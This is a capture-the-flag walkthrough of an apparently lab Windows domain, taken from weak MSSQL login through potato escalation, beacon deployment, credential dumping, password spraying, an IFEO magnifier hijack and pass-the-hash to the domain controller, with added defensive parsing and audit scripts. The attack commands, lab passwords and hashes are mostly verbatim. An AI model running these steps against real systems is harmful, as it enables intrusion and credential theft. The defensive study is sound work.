春秋云境-Tsclient

fscan.exe -h 39.98.115.156 -p 1-65535

The scan turns up a weak password.

   ___                              _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
39.98.115.156:110 open
39.98.115.156:25 open
39.98.115.156:80 open
39.98.115.156:1433 open
39.98.115.156:2383 open
39.98.115.156:3389 open
39.98.115.156:16450 open
39.98.115.156:16452 open
39.98.115.156:16451 open
39.98.115.156:16453 open
39.98.115.156:17001 open
39.98.115.156:47001 open
39.98.115.156:49665 open
39.98.115.156:49664 open
39.98.115.156:49666 open
39.98.115.156:49668 open
39.98.115.156:49669 open
39.98.115.156:49683 open
39.98.115.156:49705 open
[*] alive ports len is: 19
start vulscan
[*] WebTitle http://39.98.115.156:47001 code:404 len:315 title:Not Found
[*] WebTitle http://39.98.115.156 code:200 len:703 title:IIS Windows Server
[+] mssql 39.98.115.156:1433:sa 1qaz!QAZ
已完成 18/19 [-] (57/210) rdp 39.98.115.156:3389 administrator Aa123123 remote error: tls: access denied

Database privilege escalation

Go at the database directly with MDUT.

The resulting privileges are a bit low, so use SweetPotato.

Read the Administrator directory and find the flag.

C:/Users/Public/SweetPotato-Webshell-new.exe -a "type C:\Users\Administrator\flag\flag01.txt"

Internal network penetration

Upload a CS payload.

C:/Users/Public/SweetPotato-Webshell-new.exe -a "C:/Users/Public/beacon.exe"

Upload fscan and scan the internal segment.

shell C:/Users/Public/fscan.exe -h 172.22.8.0/24
   ___                              _    
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.8.46 is alive
(icmp) Target 172.22.8.15 is alive
(icmp) Target 172.22.8.31 is alive
(icmp) Target 172.22.8.18 is alive
[*] Icmp alive hosts len is: 4
172.22.8.15:135 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.46:135 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:80 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.46:80 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:1433 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.31:445 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.15:445 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.31:139 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.46:445 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:445 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.15:139 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.46:139 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:139 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.31:135 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:135 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.15:88 open
Open result.txt error, open result.txt: Access is denied.
[*] alive ports len is: 16
start vulscan
[*] NetInfo
[*]172.22.8.31
[->]WIN19-CLIENT
[->]172.22.8.31
Open result.txt error, open result.txt: Access is denied.
[*] WebTitle http://172.22.8.18 code:200 len:703 title:IIS Windows Server
Open result.txt error, open result.txt: Access is denied.
[*] NetBios 172.22.8.15 [+] DC:XIAORANG\DC01
Open result.txt error, open result.txt: Access is denied.
[*] NetBios 172.22.8.31 XIAORANG\WIN19-CLIENT
Open result.txt error, open result.txt: Access is denied.
[*] NetInfo
[*]172.22.8.46
[->]WIN2016
[->]172.22.8.46
Open result.txt error, open result.txt: Access is denied.
[*] NetInfo
[*]172.22.8.15
[->]DC01
[->]172.22.8.15
Open result.txt error, open result.txt: Access is denied.
[*] NetBios 172.22.8.46 WIN2016.xiaorang.lab Windows Server 2016 Datacenter 14393
Open result.txt error, open result.txt: Access is denied.
[*] NetInfo
[*]172.22.8.18
[->]WIN-WEB
[->]172.22.8.18
[->]2001:0:348b:fb58:188a:17bd:d89d:8c63
Open result.txt error, open result.txt: Access is denied.
[*] WebTitle http://172.22.8.46 code:200 len:703 title:IIS Windows Server
Open result.txt error, open result.txt: Access is denied.
[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ
Open result.txt error, open result.txt: Access is denied.
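The two fscan runs above are raw scanner output, and the internal one is interleaved with "Open result.txt" errors because the beacon could not write its result file. As an added example (my code, not part of the writeup or of fscan), the Python below parses lines in this format into a per-host port inventory and turns the credential hit and the domain-controller line into findings a defender would put on a remediation list. The sample lines are excerpted from the internal scan above; the table of which ports count as sensitive exposure is my assumption.

```python
import re
from collections import defaultdict

# Sample lines excerpted from the internal fscan run in the writeup; the
# "Open result.txt" noise is kept deliberately so the parser has to skip it.
SAMPLE_OUTPUT = """\
172.22.8.15:135 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:80 open
172.22.8.18:1433 open
172.22.8.15:445 open
172.22.8.15:88 open
[*] alive ports len is: 16
[*] WebTitle http://172.22.8.18 code:200 len:703 title:IIS Windows Server
[*] NetBios 172.22.8.15 [+] DC:XIAORANG\\DC01
[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ
"""

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
PORT_RE = re.compile(rf"^{IPV4}:(\d+) open$")
# fscan prints brute-force hits as "[+] <service> <ip>:<port>:<user> <password>"
CRED_RE = re.compile(rf"^\[\+\] (\w+) {IPV4}:(\d+):(\S+) (\S+)$")
DC_RE = re.compile(rf"^\[\*\] NetBios {IPV4} \[\+\] DC:(\S+)$")

# Assumed list of services whose exposure on an internal segment deserves a look.
SENSITIVE_PORTS = {88: "kerberos", 445: "smb", 1433: "mssql", 3389: "rdp"}


def parse_fscan(text):
    """Return a host->ports inventory, credential hits (password dropped) and DCs."""
    hosts = defaultdict(set)
    creds = []
    dcs = {}
    for raw in text.splitlines():
        line = raw.strip()
        if m := PORT_RE.match(line):
            hosts[m.group(1)].add(int(m.group(2)))
        elif m := CRED_RE.match(line):
            # The password itself is not carried into the report.
            creds.append({"service": m.group(1), "host": m.group(2),
                          "port": int(m.group(3)), "user": m.group(4)})
        elif m := DC_RE.match(line):
            dcs[m.group(1)] = m.group(2)
    return {"hosts": {h: sorted(p) for h, p in hosts.items()},
            "creds": creds, "dcs": dcs}


def findings(parsed):
    """Turn the inventory into plain-language findings for a remediation list."""
    out = []
    for host, ports in sorted(parsed["hosts"].items()):
        for port in ports:
            if port in SENSITIVE_PORTS:
                out.append(f"{host}:{port} exposes {SENSITIVE_PORTS[port]}")
    for c in parsed["creds"]:
        out.append(f"weak credential on {c['service']} {c['host']}:{c['port']} "
                   f"(user {c['user']}): rotate it and restrict the login")
    for ip, name in parsed["dcs"].items():
        out.append(f"{ip} is a domain controller ({name}) reachable from this segment")
    return out


if __name__ == "__main__":
    for f in findings(parse_fscan(SAMPLE_OUTPUT)):
        print(f)
```

The credential line is reported without its password so the report can be shared; the point of the finding is that the `sa` login accepted a dictionary password on a host that also answers on 80 and 445.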

Gather user information

shell net user

The beacon was started as SYSTEM at this point, so the hashes can be dumped directly; run hashdump from the interactive session console.

[*] Tasked beacon to dump hashes
[+] host called home, sent: 82541 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2caf35bb4c5059a3d50599844e2b9b1f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1008:aad3b435b51404eeaad3b435b51404ee:eec9381b043f098b011be51622282027:::

Check whether John is logged on.

shell quser || qwinsta

John is logged on, so try injecting into one of his processes to bring up a beacon in his context.

Take a look at the network.

shell net use

Read the shared files.

shell dir \\TSCLIENT\C

shell type \\tsclient\c\credential.txt

xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

The hint points at image hijacking (IFEO). Start a proxy and password-spray from Kali.

proxychains -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'

Logging in reports that the password has expired; changing it by logging in over RDP from Kali or with impacket both work.

impacket-smbpasswd xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'Calmsec1!'
proxychains rdesktop 172.22.8.46

172.22.8.15: RDP does not connect
172.22.8.31: cannot log in
172.22.8.46: login succeeds

Use the first Windows host as a relay to bring the new host online.

Then generate a payload with that listener.

Upload the generated payload to 8.46.

Run it.

Image hijacking (IFEO)

Privilege escalation via image hijacking; first check the permissions on the key:

get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

Here we find that every normally logged-on user can modify this registry key. Using that, we set up an Image File Execution Options hijack for the Magnifier: the magnify.exe that the Magnifier button on the logon screen would launch is replaced with C:\windows\system32\cmd.exe, so clicking it gives a SYSTEM shell directly.

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

Then lock the screen.

Click the Magnifier.

SYSTEM obtained.

Now run the uploaded payload again to get a SYSTEM beacon.
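The writeup checks the key's ACL with get-acl and then plants a Debugger value; the defender's counterpart is to audit that key for Debugger values that point at something other than a debugger, especially under the accessibility binaries the lock screen can launch as SYSTEM. As an added example (my code, not the writeup's), the Python below parses the text `reg query "<IFEO key>" /s` prints and flags such entries. The registry text is a constructed sample containing the magnify.exe hijack from the writeup, a benign Just-In-Time debugger entry, and a subkey with no Debugger value; the lists of accessibility binaries and shell-like programs are my assumptions about what is worth alerting on.

```python
import re
from pathlib import PureWindowsPath

# Accessibility helpers that the lock screen can launch as SYSTEM; an IFEO Debugger
# on any of them is the classic lock-screen backdoor (MITRE ATT&CK T1546.008).
ACCESSIBILITY_IMAGES = {"magnify.exe", "sethc.exe", "utilman.exe", "osk.exe",
                        "narrator.exe", "displayswitch.exe", "atbroker.exe"}
# Programs that are never a legitimate debugger (assumed list).
SUSPICIOUS_DEBUGGERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                        "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Constructed sample of what `reg query "<IFEO key>" /s` prints: the hijack from the
# writeup, a benign Just-In-Time debugger entry, and a subkey with no Debugger value.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe
    Debugger    REG_SZ    C:\windows\system32\cmd.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\devenv.exe
    Debugger    REG_SZ    "C:\Program Files\Tools\vsjitdebugger.exe" -p

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions
    mscorwks.dll    REG_DWORD    0x1
"""

KEY_RE = re.compile(r"^HKEY_LOCAL_MACHINE\\.*\\Image File Execution Options\\([^\\]+)$",
                    re.IGNORECASE)
DEBUGGER_RE = re.compile(r"^\s+Debugger\s+REG_(?:SZ|EXPAND_SZ)\s+(.+?)\s*$", re.IGNORECASE)


def debugger_executable(value):
    """Extract the executable's base name from a Debugger value (quoted or not)."""
    value = value.strip()
    if value.startswith('"'):
        end = value.find('"', 1)
        exe = value[1:end] if end > 0 else value[1:]
    else:
        exe = value.split()[0]
    return PureWindowsPath(exe).name.lower()


def parse_ifeo(text):
    """Return one record per IFEO subkey that carries a Debugger value."""
    entries, image = [], None
    for line in text.splitlines():
        if km := KEY_RE.match(line.strip()):
            image = km.group(1).lower()
            continue
        if image and (dm := DEBUGGER_RE.match(line)):
            entries.append({"image": image, "debugger": dm.group(1),
                            "exe": debugger_executable(dm.group(1))})
    return entries


def audit_ifeo(text):
    """Return the entries a defender should remove, with the reason for each."""
    alerts = []
    for entry in parse_ifeo(text):
        reasons = []
        if entry["image"] in ACCESSIBILITY_IMAGES:
            reasons.append("target is an accessibility binary launchable from the lock screen")
        if entry["exe"] in SUSPICIOUS_DEBUGGERS:
            reasons.append(f"debugger is {entry['exe']}, which is a shell, not a debugger")
        if reasons:
            alerts.append({**entry, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in audit_ifeo(SAMPLE_REG_QUERY):
        print(f"{a['image']} -> {a['debugger']}: " + "; ".join(a["reasons"]))
```

Remediation for a hit is to delete the Debugger value and, as the get-acl check above shows, to make sure the IFEO key's ACL no longer grants write access to ordinary users; the writeup's whole escalation depends on that ACL.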

shell type C:\Users\Administrator\flag\flag02.txt

Second flag obtained.

logonpasswords
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN2016$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2025/3/8 23:26:49
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WIN2016$
* Domain : XIAORANG
* NTLM : 40af44e61e8174dfa92f90a696be81e8
* SHA1 : 378b412b2e447892d8b92acde54467d5b41f3a3c
tspkg :
wdigest :
* Username : WIN2016$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : win2016$
* Domain : XIAORANG.LAB
* Password : 37 b1 92 79 03 15 71 7b 30 27 db aa bf 8e cb 2b 01 22 6b 2f 20 4d 72 67 e9 99 f1 48 7b f3 31 df d3 b6 c7 67 0e 42 aa f4 a6 0f 08 b3 db f8 44 af c5 af 2e d7 a5 30 82 be 43 13 a4 4a 45 ba 8f f9 be af 75 f9 fb 4b e1 10 31 a7 0d a7 ab 93 f9 45 d2 3f 04 51 08 80 24 b0 f4 eb 39 a6 9b 77 f6 b3 ff 02 0b 66 ec 00 9c b6 8b c3 0b 0a 11 5a b3 4f 7f 26 ad cd de d3 35 62 fa 1a 25 87 d4 83 f2 3b 5b 60 88 b3 51 7c 81 5f 02 3a ec 2e 2d 9c 9c a6 ed bb 87 b7 6c 3e 77 75 46 47 b3 7c 9a c0 e7 cb 18 a1 ff 36 e9 5f bc 75 97 68 52 7a 05 b0 41 83 30 20 2f f5 67 9d 2f 96 7b 45 cb 61 f8 28 7a 1f 83 1d e7 cb 88 72 23 d1 f7 10 99 13 d1 5c 1e 12 7d ed 4c f8 f0 9b 01 cd ca ba 8c 10 e3 e8 4d ab be 56 ce 33 86 f5 81 68 42 17 6b 3f 22 a0 dd 29
ssp :
credman :

Authentication Id : 0 ; 851871 (00000000:000cff9f)
Session : RemoteInteractive from 2
User Name : Aldrich
Domain : XIAORANG
Logon Server : DC01
Logon Time : 2025/3/8 23:33:01
SID : S-1-5-21-3289074908-3315245560-3429321632-1105
msv :
[00000003] Primary
* Username : Aldrich
* Domain : XIAORANG
* NTLM : effdad263995efa4a11f6bc121ef623a
* SHA1 : 6691986c4240cf9025618b8c34639c226891b86e
* DPAPI : 5e4bb4bd0e5ffefa26f4c78b6df8c2a2
tspkg :
wdigest :
* Username : Aldrich
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Aldrich
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 829666 (00000000:000ca8e2)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/8 23:33:01
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN2016$
* Domain : XIAORANG
* NTLM : 4ba974f170ab0fe1a8a1eb0ed8f6fe1a
* SHA1 : e06238ecefc14d675f762b08a456770dc000f763
tspkg :
wdigest :
* Username : WIN2016$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN2016$
* Domain : xiaorang.lab
* Password : 9e ae c4 7a ed ee 91 74 a5 59 61 a5 00 2c c5 00 60 3b 87 48 d0 17 48 cf df 7b 14 af 9a 99 22 b5 94 ba 0a 1e f0 6e f0 25 b1 e2 a2 62 fb b8 68 93 42 64 08 b7 f6 2e f7 cf ae a3 7a 94 9d 32 24 1a b1 6b 87 6c 5e f1 d3 89 c6 c4 8b d3 bd 05 9c b0 e1 85 d4 2c 03 56 5f af 09 15 12 10 df 74 e7 4c d3 65 55 d8 ab bd b4 71 5c 8c a7 bd 14 60 8b 44 b5 d8 d8 61 23 f1 4f 4d 8e a0 dc ac 8a 60 15 0d f7 9f a1 85 98 c4 cf 34 ec ee ea c5 b9 5b 42 8b 97 cc 4d ed 1f db 8c b4 45 06 ce 40 fc 81 96 ac c3 61 e5 e9 42 90 69 f3 b2 85 fa 80 59 e2 8b a5 f6 70 5d 1a bd 5f b1 85 6b ae b0 16 42 29 2c 99 57 fb 49 ea e3 29 49 56 55 6c 9a 2b ee 13 77 fe d7 a3 51 b8 01 ec bb 60 22 b8 7c 2f f5 6b 0f 6b 87 36 76 45 81 7e e3 71 0a a8 ca 2a a3 a6 05 64
ssp :
credman :

Authentication Id : 0 ; 828954 (00000000:000ca61a)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/8 23:33:01
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN2016$
* Domain : XIAORANG
* NTLM : 40af44e61e8174dfa92f90a696be81e8
* SHA1 : 378b412b2e447892d8b92acde54467d5b41f3a3c
tspkg :
wdigest :
* Username : WIN2016$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN2016$
* Domain : xiaorang.lab
* Password : 37 b1 92 79 03 15 71 7b 30 27 db aa bf 8e cb 2b 01 22 6b 2f 20 4d 72 67 e9 99 f1 48 7b f3 31 df d3 b6 c7 67 0e 42 aa f4 a6 0f 08 b3 db f8 44 af c5 af 2e d7 a5 30 82 be 43 13 a4 4a 45 ba 8f f9 be af 75 f9 fb 4b e1 10 31 a7 0d a7 ab 93 f9 45 d2 3f 04 51 08 80 24 b0 f4 eb 39 a6 9b 77 f6 b3 ff 02 0b 66 ec 00 9c b6 8b c3 0b 0a 11 5a b3 4f 7f 26 ad cd de d3 35 62 fa 1a 25 87 d4 83 f2 3b 5b 60 88 b3 51 7c 81 5f 02 3a ec 2e 2d 9c 9c a6 ed bb 87 b7 6c 3e 77 75 46 47 b3 7c 9a c0 e7 cb 18 a1 ff 36 e9 5f bc 75 97 68 52 7a 05 b0 41 83 30 20 2f f5 67 9d 2f 96 7b 45 cb 61 f8 28 7a 1f 83 1d e7 cb 88 72 23 d1 f7 10 99 13 d1 5c 1e 12 7d ed 4c f8 f0 9b 01 cd ca ba 8c 10 e3 e8 4d ab be 56 ce 33 86 f5 81 68 42 17 6b 3f 22 a0 dd 29
ssp :
credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/3/8 23:26:53
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/3/8 23:26:50
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 54890 (00000000:0000d66a)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/8 23:26:50
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WIN2016$
* Domain : XIAORANG
* NTLM : 4ba974f170ab0fe1a8a1eb0ed8f6fe1a
* SHA1 : e06238ecefc14d675f762b08a456770dc000f763
tspkg :
wdigest :
* Username : WIN2016$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN2016$
* Domain : xiaorang.lab
* Password : 9e ae c4 7a ed ee 91 74 a5 59 61 a5 00 2c c5 00 60 3b 87 48 d0 17 48 cf df 7b 14 af 9a 99 22 b5 94 ba 0a 1e f0 6e f0 25 b1 e2 a2 62 fb b8 68 93 42 64 08 b7 f6 2e f7 cf ae a3 7a 94 9d 32 24 1a b1 6b 87 6c 5e f1 d3 89 c6 c4 8b d3 bd 05 9c b0 e1 85 d4 2c 03 56 5f af 09 15 12 10 df 74 e7 4c d3 65 55 d8 ab bd b4 71 5c 8c a7 bd 14 60 8b 44 b5 d8 d8 61 23 f1 4f 4d 8e a0 dc ac 8a 60 15 0d f7 9f a1 85 98 c4 cf 34 ec ee ea c5 b9 5b 42 8b 97 cc 4d ed 1f db 8c b4 45 06 ce 40 fc 81 96 ac c3 61 e5 e9 42 90 69 f3 b2 85 fa 80 59 e2 8b a5 f6 70 5d 1a bd 5f b1 85 6b ae b0 16 42 29 2c 99 57 fb 49 ea e3 29 49 56 55 6c 9a 2b ee 13 77 fe d7 a3 51 b8 01 ec bb 60 22 b8 7c 2f f5 6b 0f 6b 87 36 76 45 81 7e e3 71 0a a8 ca 2a a3 a6 05 64
ssp :
credman :

Authentication Id : 0 ; 54870 (00000000:0000d656)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/8 23:26:50
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WIN2016$
* Domain : XIAORANG
* NTLM : 40af44e61e8174dfa92f90a696be81e8
* SHA1 : 378b412b2e447892d8b92acde54467d5b41f3a3c
tspkg :
wdigest :
* Username : WIN2016$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN2016$
* Domain : xiaorang.lab
* Password : 37 b1 92 79 03 15 71 7b 30 27 db aa bf 8e cb 2b 01 22 6b 2f 20 4d 72 67 e9 99 f1 48 7b f3 31 df d3 b6 c7 67 0e 42 aa f4 a6 0f 08 b3 db f8 44 af c5 af 2e d7 a5 30 82 be 43 13 a4 4a 45 ba 8f f9 be af 75 f9 fb 4b e1 10 31 a7 0d a7 ab 93 f9 45 d2 3f 04 51 08 80 24 b0 f4 eb 39 a6 9b 77 f6 b3 ff 02 0b 66 ec 00 9c b6 8b c3 0b 0a 11 5a b3 4f 7f 26 ad cd de d3 35 62 fa 1a 25 87 d4 83 f2 3b 5b 60 88 b3 51 7c 81 5f 02 3a ec 2e 2d 9c 9c a6 ed bb 87 b7 6c 3e 77 75 46 47 b3 7c 9a c0 e7 cb 18 a1 ff 36 e9 5f bc 75 97 68 52 7a 05 b0 41 83 30 20 2f f5 67 9d 2f 96 7b 45 cb 61 f8 28 7a 1f 83 1d e7 cb 88 72 23 d1 f7 10 99 13 d1 5c 1e 12 7d ed 4c f8 f0 9b 01 cd ca ba 8c 10 e3 e8 4d ab be 56 ce 33 86 f5 81 68 42 17 6b 3f 22 a0 dd 29
ssp :
credman :

Authentication Id : 0 ; 25098 (00000000:0000620a)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/3/8 23:26:49
SID :
msv :
[00000003] Primary
* Username : WIN2016$
* Domain : XIAORANG
* NTLM : 40af44e61e8174dfa92f90a696be81e8
* SHA1 : 378b412b2e447892d8b92acde54467d5b41f3a3c
tspkg :
wdigest :
kerberos :
ssp :
credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN2016$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2025/3/8 23:26:49
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN2016$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : win2016$
* Domain : XIAORANG.LAB
* Password : 37 b1 92 79 03 15 71 7b 30 27 db aa bf 8e cb 2b 01 22 6b 2f 20 4d 72 67 e9 99 f1 48 7b f3 31 df d3 b6 c7 67 0e 42 aa f4 a6 0f 08 b3 db f8 44 af c5 af 2e d7 a5 30 82 be 43 13 a4 4a 45 ba 8f f9 be af 75 f9 fb 4b e1 10 31 a7 0d a7 ab 93 f9 45 d2 3f 04 51 08 80 24 b0 f4 eb 39 a6 9b 77 f6 b3 ff 02 0b 66 ec 00 9c b6 8b c3 0b 0a 11 5a b3 4f 7f 26 ad cd de d3 35 62 fa 1a 25 87 d4 83 f2 3b 5b 60 88 b3 51 7c 81 5f 02 3a ec 2e 2d 9c 9c a6 ed bb 87 b7 6c 3e 77 75 46 47 b3 7c 9a c0 e7 cb 18 a1 ff 36 e9 5f bc 75 97 68 52 7a 05 b0 41 83 30 20 2f f5 67 9d 2f 96 7b 45 cb 61 f8 28 7a 1f 83 1d e7 cb 88 72 23 d1 f7 10 99 13 d1 5c 1e 12 7d ed 4c f8 f0 9b 01 cd ca ba 8c 10 e3 e8 4d ab be 56 ce 33 86 f5 81 68 42 17 6b 3f 22 a0 dd 29
ssp :
credman :

shell net user /domain
这项请求将在域 xiaorang.lab 的域控制器处理。


\\DC01.xiaorang.lab 的用户帐户

-------------------------------------------------------------------------------
Administrator Aldrich Guest
krbtgt
命令运行完毕,但发生一个或多个错误
shell net group "domain admins" /domain
这项请求将在域 xiaorang.lab 的域控制器处理。

组名 Domain Admins
注释 指定的域管理员

成员

-------------------------------------------------------------------------------
Administrator WIN2016$
命令成功完成。

WIN2016$ is a member of Domain Admins, so dump its hash and pass-the-hash straight to the DC.

proxychains4 crackmapexec smb 172.22.8.15 -u WIN2016$ -H 40af44e61e8174dfa92f90a696be81e8 -d xiaorang -x "type C:\Users\Administrator\flag\flag03.txt"
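The hashdump output earlier and the Domain Admins listing just above are things a defender should be reading as well. As an added example (my code, not the writeup's), the Python below parses pwdump-style lines and flags accounts whose NT hash is the hash of the empty password, and parses `net group` output to flag computer accounts (names ending in `$`) that sit in a privileged group. The latter is the misconfiguration this writeup exploits: a computer account's credential lives in LSASS on that host, so anyone who is SYSTEM there is effectively a domain admin. Both samples are excerpted from the writeup's output; the empty-password LM and NT hashes are well-known constants.

```python
import re

EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty password (LM disabled)

# Excerpt of the hashdump output from the writeup above.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2caf35bb4c5059a3d50599844e2b9b1f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1008:aad3b435b51404eeaad3b435b51404ee:eec9381b043f098b011be51622282027:::
"""

# `net group "domain admins" /domain` output from the writeup; the Chinese banner
# lines are the real program output on that host and are left as they are.
SAMPLE_NET_GROUP = """\
这项请求将在域 xiaorang.lab 的域控制器处理。

组名     Domain Admins
注释     指定的域管理员

成员

-------------------------------------------------------------------------------
Administrator            WIN2016$
命令成功完成。
"""

PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.IGNORECASE)


def parse_pwdump(text):
    """Parse user:rid:lm:nt::: lines into dicts; hashes are normalised to lower case."""
    accounts = []
    for line in text.splitlines():
        if m := PWDUMP_RE.match(line.strip()):
            accounts.append({"user": m.group(1), "rid": int(m.group(2)),
                             "lm": m.group(3).lower(), "nt": m.group(4).lower()})
    return accounts


def blank_password_accounts(text):
    """Accounts whose NT hash is the empty-password hash."""
    return [a["user"] for a in parse_pwdump(text) if a["nt"] == EMPTY_NT_HASH]


def parse_net_group_members(text):
    """Collect the member names printed after the dashed separator of `net group`."""
    members, in_members = [], False
    for line in text.splitlines():
        if line.startswith("-----"):
            in_members = True
            continue
        if not in_members:
            continue
        # The member block ends at the blank line or the "command completed" footer
        # (Chinese "命令..." or English "The command...").
        if not line.strip() or line.startswith("命令") or line.lower().startswith("the command"):
            break
        members.extend(line.split())
    return members


def computer_accounts_in_group(text):
    """Computer accounts (trailing '$') that appear in the group listing."""
    return [m for m in parse_net_group_members(text) if m.endswith("$")]


if __name__ == "__main__":
    print("blank-password accounts:", blank_password_accounts(SAMPLE_HASHDUMP))
    print("computer accounts in group:", computer_accounts_in_group(SAMPLE_NET_GROUP))
```

DefaultAccount and Guest are disabled by default on this Windows version, so a blank hash there is expected and should be cross-checked against `net user <name>` for the account's status; the same hash on any other account is a finding. A computer account in Domain Admins should simply be removed from the group, since nothing about a member server needs that membership.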